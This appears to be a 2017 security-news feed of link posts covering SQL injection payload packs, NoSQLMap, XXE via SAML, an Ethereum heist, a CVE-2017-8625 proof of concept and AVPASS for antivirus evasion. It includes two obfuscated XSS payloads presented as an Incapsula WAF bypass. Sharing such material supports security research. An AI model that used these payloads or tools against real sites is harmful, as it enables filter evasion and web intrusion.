SQL-Injection-Payloads-master.zip
8.2 KB
SQLi payloads for use in Burp Suite and OWASP Zed Attack Proxy
An unknown hacker managed to steal Ethereum worth 471 thousand dollars by hacking Enigma.
https://securityaffairs.co/wordpress/62219/hacking/enigma-platform-hacked.html
#cryptocurrency
#btc
#ethereum
Security Affairs
Enigma platform hacked, hackers stole over $470,000 worth of Ethereum
Another cyber heist made the headlines, this time an unknown hacker has stolen more than $471,000 worth of Ethereum cryptocurrency.
NoSQLMap – Automated NoSQL Exploitation Tool
https://www.darknet.org.uk/2017/08/nosqlmap-automated-nosql-exploitation-tool/
#nosql
#injection
#pentest
#web
#database
out-of-band-xml-external-entity-injection-via-saml-redacted.pdf
267.5 KB
Out of Band
XML External Entity Injection via SAML SSO
Oracle plans to open-source J2E!
https://www.techworm.net/2017/08/oracle-open-source-java-enterprise-edition-java-ee.html
Incapsula WAF XSS bypass
1) <iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
2) <img/src=q onerror='new Function`al\ert\`1\``'>
Tutorial: restricting user access on Linux
https://linuxconfig.org/how-to-restrict-users-access-on-a-linux-machine
#linux
LinuxConfig
How to restrict users access on a Linux machine
Learn how to restrict users access on a Linux machine EASY In this tutorial we are going to learn how to restrict access to a Linux machine by interacting with two files: , which let us specify from…
The Windows Calculator uses the Internet!
This access is apparently for updating currency exchange rates.
https://security.stackexchange.com/questions/168137/unusual-case-of-microsoft-calculator
#windows
#malware
Detecting and exploiting SQL Injection bugs
https://gbhackers.com/sqlmap-detecting-exploiting-sql-injection/
#sqli
#web
#pentest
Tips for discovering SQLi bugs
https://gerbenjavado.com/manual-sql-injection-discovery-tips/
#web
#sqli
#pentest
Exploit proof of concept for CVE-2017-8625
https://posts.specterops.io/umci-vs-internet-explorer-exploring-cve-2017-8625-3946536c6442
#windows
#exploit
#js
#ps
AVPASS
AVPASS is a tool for leaking the detection model of Android malware detection systems (i.e., antivirus software), and bypassing their detection logics by using the leaked information coupled with APK obfuscation techniques.
https://github.com/sslab-gatech/avpass
#android
#smartsecurity
#malware
#trojan
GitHub
GitHub - sslab-gatech/avpass: Tool for leaking and bypassing Android malware detection system
Tool for leaking and bypassing Android malware detection system - sslab-gatech/avpass
Discovering a server that stores user data, using a PDF file
https://www.ringzerolabs.com/2017/08/large-victim-credential-server.html
Ringzerolabs
Large Victim Credential Server Uncovered
Large Victim Credential Server Uncovered Via PDF Phishing